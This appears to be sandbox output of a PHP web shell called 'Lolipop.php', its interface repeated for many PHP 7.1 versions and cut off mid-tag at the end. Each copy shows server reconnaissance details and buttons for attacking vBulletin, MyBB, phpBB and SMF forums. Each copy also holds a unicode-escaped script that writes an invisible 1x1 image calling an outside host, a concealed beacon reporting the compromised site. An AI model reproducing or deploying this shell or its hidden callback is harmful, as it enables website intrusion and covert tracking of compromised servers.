<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.16</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.15
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.15</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.14
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.14</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.13
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.13</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.12
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.12</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.11
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.11</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.10
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.10</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.9
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.9</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.8
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.8</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.7
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.7</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.6
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.6</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.5
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.5</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script 